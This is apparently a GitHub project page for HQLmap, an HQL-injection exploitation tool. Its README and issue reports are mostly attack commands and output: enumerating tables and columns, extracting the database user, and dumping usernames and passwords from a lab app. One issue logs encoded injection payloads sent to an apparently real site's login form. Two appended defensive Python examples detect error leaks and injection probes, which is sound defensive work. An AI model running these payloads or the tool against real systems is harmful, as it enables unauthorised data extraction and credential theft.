hqlmap's Introduction

HQLMap

This project was created to exploit HQL injections. The tool is written in Python and released under the MIT License. Future development : I have in mind to develop a specific module for SQLmap.

Where can you try the tool ?

If you want a fast vulnerable environment where you can try the tool, I would recommend using RopeyTasks : https://github.com/continuumsecurity/RopeyTasks/

Moreover, if you want further information regarding HQLi, check this blog post : http://blog.h3xstream.com/2014/02/hql-for-pentesters.html

Installation

To install this project, you just have to clone this project by typing :

git clone git@github.com:PaulSec/HQLmap.git

Usage

To use this project, go into the directory :

cd HQLmap

And launch the project :

python HQLmap.py

Usage is then displayed :

Usage: HQLmap.py [options]

Options:
  -h, --help            show this help message and exit
  --url=URL             qURL to pentest
  --cookie=COOKIE       Cookie to test it
  --param=PARAM         Param to test
  --postdata=POSTDATA   Postdata (POST Method)  
  --message=BLIND_HQLI_MESSAGE
                        Message appearing while Blind HQLi
  --tables              Tries to gather as much tables as possible (With
                        Bruteforce)
  --T=TABLE             Name of the table you want to get
  --table_name_file=FILE_TABLE
                        DB file for name of tables
  --columns             Tries to gather as much columns as possible (With
                        Bruteforce)
  --C=COLUMN            Name of the column you want to get
  --column_name_file=FILE_COLUMN
                        DB file for name of columns
  --check               Check if host is vulnerable
  --user                Tries to get user() from dbms
  --count               Get count of specified table(s)
  --dump                Dump specified table(s) / column(s)
  --results             Enumerate results after session
  --verbose             Verbose mode

Usage

This part includes different scenarios.

Checking if host is vulnerable

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --check

The output is really simple :

Host seems vulnerable.

Checking with POSTDATA

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=A101D5D76A260E9ECD2E10ADE9DF0E47" --T=User --results --dump --postdata="username=Test&password=Test!!!"

Enumerating tables

$ python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --tables

Here is the output :

[!] Table User has been found.
[!] Table Task has been found.
[-] Table News does not exist.
[-] Table Test does not exist.

When performing this enumeration, the scanner uses the default file of table names if none is specified. The default file is : db/tables.db

Enumerating columns

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --tables --columns
[!] Table User has been found.
[!] Table Task has been found.
[-] Table News does not exist.
[-] Table Test does not exist.
[!] Column Id has been found in table Task
[-] Column username in Task does not exist.
[-] Column password in Task does not exist.
[!] Column Status has been found in table Task
[-] Column user_id in Task does not exist.
(...)
[!] Column Password has been found in table User
[-] Column status in User does not exist.
[-] Column user_id in User does not exist.
[!] Column Email has been found in table User
[!] Column Firstname has been found in table User
[!] Column Lastname has been found in table User

When performing this enumeration, the scanner uses the default files for both the table names and the column names. The default files are :

For tables : db/tables.db
For columns : db/columns.db

Checking existence of a specific table

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --T=foo

And the output :

[-] Table foo does not exist.

Enumerating columns of a specific table

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --T=User --columns

And the output :

[!] Table User has been found.
[!] Column Id has been found in table User
[!] Column Username has been found in table User
[!] Column Password has been found in table User
[-] Column status in User does not exist.
[-] Column user_id in User does not exist.
[!] Column Email has been found in table User
[!] Column Firstname has been found in table User
[!] Column Lastname has been found in table User

Checking the existence of a specific column for a specific table

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --T=User --C=bar

And the output :

[!] Table User has been found.
[-] Column bar in User does not exist.

Fingerprinting options

Retrieving the count of a table

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --message="Eggs, Milk and Cheese baby, yeah." --T=User --count

Or for all tables :

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --message="Eggs, Milk and Cheese baby, yeah." --tables --count

And the output :

[!] Table User has been found.
[!] Count(*) of User : 3

Retrieving user of the database

To do this, specify a table (or all tables with the --tables flag) and add the --user flag this way :

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --message="Eggs, Milk and Cheese baby, yeah." --T=User --user

And the output (after a few seconds) :

[!] Table User has been found.
[!] Username of Database found : SA

To retrieve the user, I implemented an algorithm really similar to a "variable" dichotomy.

Dumping database

All tables from database

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=83C59DCB04A6DC954E4E1EEC2BB36EF6" --tables --columns --dump

And the output :

(redacted)
[Task]
  [Name]
     - Bob's shopping
     - Alice's shopping
[Task]
  [User_Id]
     - 1
     - 2
[User]
  [Id]
     - 1
     - 2
     - 3
[User]
  [Username]
     - bob
     - alice
     - admin
(redacted)

Specific table from database

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=83C59DCB04A6DC954E4E1EEC2BB36EF6" --T=User --columns --dump

And the output:

[User]
  [Id]
     - 1
     - 2
     - 3
[User]
  [Username]
     - bob
     - alice
     - admin
[User]
  [Password]
     - password
     - password
     - password
[User]
  [Email]
     - [email protected]
     - [email protected]
     - [email protected]
[User]
  [Firstname]
     - Robert
     - Alice
     - Administrator
[User]
  [Lastname]
     - McBride
     - O'Reilly
     - Reynolds

Specific column from database

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=83C59DCB04A6DC954E4E1EEC2BB36EF6" --T=User --C=username --dump

And the output :

[!] Table User has been found.
[!] Column Username has been found in table User
[User]
  [username]
     - bob
     - alice
     - admin

Conclusion (& License)

Feel free to give feedback and ask for new features.

Project released under MIT license.

hqlmap's People

Contributors

paulsec, theguly

hqlmap's Issues

Clean URL support

Hello,

Is it possible to test for HQL injection vulnerabilities using HQLmap with a URL that uses mod rewrite (or something like it) to make the URLs clean?

I know how to test my sites that have urls like: http://mysite.com/?id=1

But what about my sites that have clean urls, like: http://mysite.com/1
Thanks.

Eliminate False Positives

Hello @PaulSec ,

I tried running this one on my very own Apache Server which doesn't have a db on but just a static page and here is the output:

shipcod3@arfarf:~/pentest/HQLmap$ python HQLmap.py --url="http://localhost?id=jay" --param=id --tables --columns
[!] Table User has been found.
[!] Table Task has been found.
[!] Table News has been found.
[!] Table Test has been found.
[!] Column Id has been found in table Test
[!] Column Username has been found in table Test
[!] Column Password has been found in table Test
[!] Column Status has been found in table Test
[!] Column User_Id has been found in table Test
[!] Column Email has been found in table Test
[!] Column Firstname has been found in table Test
[!] Column Lastname has been found in table Test
[!] Column Id has been found in table News
[!] Column Username has been found in table News
[!] Column Password has been found in table News
[!] Column Status has been found in table News
[!] Column User_Id has been found in table News
[!] Column Email has been found in table News
[!] Column Firstname has been found in table News
[!] Column Lastname has been found in table News
[!] Column Id has been found in table Task
[!] Column Username has been found in table Task
[!] Column Password has been found in table Task
[!] Column Status has been found in table Task
[!] Column User_Id has been found in table Task
[!] Column Email has been found in table Task
[!] Column Firstname has been found in table Task
[!] Column Lastname has been found in table Task
[!] Column Id has been found in table User
[!] Column Username has been found in table User
[!] Column Password has been found in table User
[!] Column Status has been found in table User
[!] Column User_Id has been found in table User
[!] Column Email has been found in table User
[!] Column Firstname has been found in table User
[!] Column Lastname has been found in table User

I guess on 200 status code pages, it just gives the default tables and columns. I tried this one and Google and it has the same output.

table_exists method is not perfect

def table_exists(message):
    if ('is not mapped' in message):
        return False
    else:
        return True

The method for checking whether a table exists is to check whether the 'is not mapped' string is in the response.
I doubt this method, and I have a failing example.
This is the request URL

?isAsc=false&orderBy=name&pageNum=1&pageSize=10

The response is

{"result":"failed","responseCode":"","data":"","errorMsg":"org.hibernate.QueryException: could not resolve property: name of:com.xxx\n\tat org.hibernate.persister.entity.AbstractPropertyMapping.propertyException(AbstractPropertyMapping.java:83

This request orders by a column; if the column does not exist, it responds with this exception. I do not think this is a SQLi vulnerability.
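
The response quoted in this issue returns Hibernate's exception text and a stack frame to the client, and both the 'is not mapped' check and the reporter's counter-example rely on that text being visible. As an added example (not part of the issue or of HQLmap), this Python check flags such leaks in a response body and swaps in a generic error; the pattern names, the `safe_error_body` helper and the sample bodies are assumptions constructed for illustration.

```python
import json
import re

# Hibernate error markers. "is not mapped" and "could not resolve property"
# are the two strings quoted in the issue; the other two are assumptions.
LEAK_PATTERNS = {
    "unmapped_entity": re.compile(r"\bis not mapped\b"),
    "unknown_property": re.compile(r"could not resolve property: \S+ of:\s*\S+"),
    "hibernate_exception": re.compile(r"\borg\.hibernate\.[\w.]*Exception\b"),
    "java_stack_frame": re.compile(r"\bat [\w.$]+\([\w$]+\.java:\d+\)"),
}


def _strings(node):
    """Yield every string value inside a decoded JSON document."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for value in node.values():
            yield from _strings(value)
    elif isinstance(node, list):
        for value in node:
            yield from _strings(value)


def find_orm_leaks(body):
    """Return the sorted names of leak markers found in a response body."""
    try:
        # Decode JSON first so escaped "\n\tat ..." frames become real text.
        text = "\n".join(_strings(json.loads(body)))
    except ValueError:
        text = body  # not JSON: scan the raw text (HTML error page, plain text)
    return sorted(name for name, rx in LEAK_PATTERNS.items() if rx.search(text))


def safe_error_body(body, incident_id):
    """Pass clean bodies through; replace leaking ones with a generic error."""
    if not find_orm_leaks(body):
        return body
    return json.dumps({"result": "failed", "errorMsg": "internal error",
                       "incidentId": incident_id})


# Constructed samples modelled on the response quoted in the issue.
PROPERTY_ERROR = json.dumps({"result": "failed", "errorMsg":
    "org.hibernate.QueryException: could not resolve property: name of:com.xxx"
    "\n\tat org.hibernate.persister.entity.AbstractPropertyMapping"
    ".propertyException(AbstractPropertyMapping.java:83)"})
UNMAPPED_ERROR = ("<pre>org.hibernate.hql.internal.ast.QuerySyntaxException: "
                  "News is not mapped [from News]</pre>")
CLEAN = json.dumps({"result": "ok", "data": [{"name": "Bob's shopping"}]})

if __name__ == "__main__":
    for label, body in [("property", PROPERTY_ERROR),
                        ("unmapped", UNMAPPED_ERROR), ("clean", CLEAN)]:
        print(label, find_orm_leaks(body))
```

Run against captured responses in a test suite, a non-empty result means the endpoint still exposes the error text; the full exception belongs in the server log under the incident id.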

Ignores post parameters

Seems the tool always tries to inject in URL parameters even if --postdata is present, e.g.:

python HQLmap.py --url="http://localhost:9110/ropeytasks/user/index" --postdata="username=bob&password=&_action_login=Login"

Traceback (most recent call last):
  File "HQLmap.py", line 360, in <module>
    params = opts.url.split('?')[1]
IndexError: list index out of range

parameter '--columns' and '--C' do not work without parameter '--tables'

Description

There are some logical problems with the parameter '--tables'.
The problem is as described in the issue's title.

Detail

x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.

x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser --columns
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.
Trying to find columns for table com_recruit.entity.sysuser.hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found (again).
Traceback (most recent call last):
  File "X:\hqlmap\HQLmap.py", line 459, in <module>
    find_columns(opts.file_column, opts.table)
  File "X:\hqlmap\HQLmap.py", line 161, in find_columns
    find_column(table_name, column)
  File "X:\hqlmap\HQLmap.py", line 170, in find_column
    raise Exception('Table ' + table + ' does not exist ?')
Exception: Table com_recruit.entity.sysuser.hdzuser does not exist ?

x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser --C hdPassWord
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.
Trying to find column hdPassWord for table com_recruit.entity.sysuser.hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found (again).
Traceback (most recent call last):
  File "X:\hqlmap\HQLmap.py", line 471, in <module>
    find_column(opts.table, opts.column)
  File "X:\hqlmap\HQLmap.py", line 170, in find_column
    raise Exception('Table ' + table + ' does not exist ?')
Exception: Table com_recruit.entity.sysuser.hdzuser does not exist ?

x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser --C hdPassWord --tables
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Trying to gather as much tables..
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+User%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table User does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+Task%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Task does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+News%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table News does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+Test%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Test does not exist.
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.
Trying to find column hdPassWord for all tables
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.hdPassWord%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Hdpassword has been found in table Com_Recruit.Entity.Sysuser.Hdzuser

x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser --columns
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.
Trying to find columns for table com_recruit.entity.sysuser.hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found (again).
Traceback (most recent call last):
  File "X:\hqlmap\HQLmap.py", line 459, in <module>
    find_columns(opts.file_column, opts.table)
  File "X:\hqlmap\HQLmap.py", line 161, in find_columns
    find_column(table_name, column)
  File "X:\hqlmap\HQLmap.py", line 170, in find_column
    raise Exception('Table ' + table + ' does not exist ?')
Exception: Table com_recruit.entity.sysuser.hdzuser does not exist ?

x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser --columns --tables
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Trying to gather as much tables..
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+User%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table User does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+Task%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Task does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+News%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table News does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+Test%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Test does not exist.
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.
Trying to find columns for all tables
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.id%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Id has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.username%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Username has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.password%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Password has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.status%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Status has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.user_id%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column User_Id has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.email%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Email has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.firstname%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Firstname has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.lastname%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Lastname has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
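
The POSTDATA lines in the verbose output above show the shape of each probe: a quote, then a count subselect over a guessed entity or property. As an added example (not HQLmap code), this Python detector decodes request parameters, recognises that shape and flags a client that walks through several names; the client addresses, the threshold and the function names are assumptions, and the sample requests are constructed from the page's POSTDATA.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Subselect shape seen in the POSTDATA lines above, after URL decoding:
#   'and (select count(*) from <Entity>) >= 0 or ''='
#   'and (select count(w.<property>) from <Entity> w) >= 0 or ''='
PROBE_RX = re.compile(
    r"'\s*and\s*\(\s*select\s+count\(\s*(?:\*|\w+\.(?P<column>\w+))\s*\)"
    r"\s+from\s+(?P<entity>[\w.]+)",
    re.IGNORECASE,
)


def find_probes(encoded_params):
    """Decode a query string or form body; return (param, entity, column) per probe."""
    hits = []
    for name, value in parse_qsl(encoded_params, keep_blank_values=True):
        match = PROBE_RX.search(value)
        if match:
            hits.append((name, match.group("entity"), match.group("column")))
    return hits


def enumeration_alerts(requests, min_distinct=3):
    """Flag clients whose probes name at least min_distinct entity/property pairs."""
    seen = defaultdict(set)
    for client, encoded in requests:
        for _param, entity, column in find_probes(encoded):
            seen[client].add((entity.lower(), column or "*"))
    return {client: sorted(targets) for client, targets in seen.items()
            if len(targets) >= min_distinct}


# Constructed sample traffic; the bodies reuse the POSTDATA shown on this page,
# the client addresses are documentation-range placeholders.
TABLE_PROBE = ("hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+{}%29"
               "+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb")
COLUMN_PROBE = ("hdu.hdPassWord=password%27and+%28select+count%28w.id%29+from+"
                "Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27"
                "&hdu.hdUsersNmae=admin&verifyCode=jgnb")
BENIGN = "hdu.hdPassWord=password&hdu.hdUsersNmae=admin&verifyCode=jgnb"
BENIGN_QUOTE = "q=O%27Reilly+and+sons&search=Search"  # apostrophe, no subselect

SAMPLE_REQUESTS = (
    [("192.0.2.10", TABLE_PROBE.format(t)) for t in ("User", "Task", "News", "Test")]
    + [("198.51.100.7", BENIGN), ("198.51.100.7", BENIGN_QUOTE),
       ("203.0.113.5", COLUMN_PROBE)]
)

if __name__ == "__main__":
    for client, body in SAMPLE_REQUESTS:
        print(client, find_probes(body))
    print("alerts:", enumeration_alerts(SAMPLE_REQUESTS))
```

The signature only covers the payload shape shown on this page; binding user input as query parameters instead of concatenating it into HQL is what removes the injection itself.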
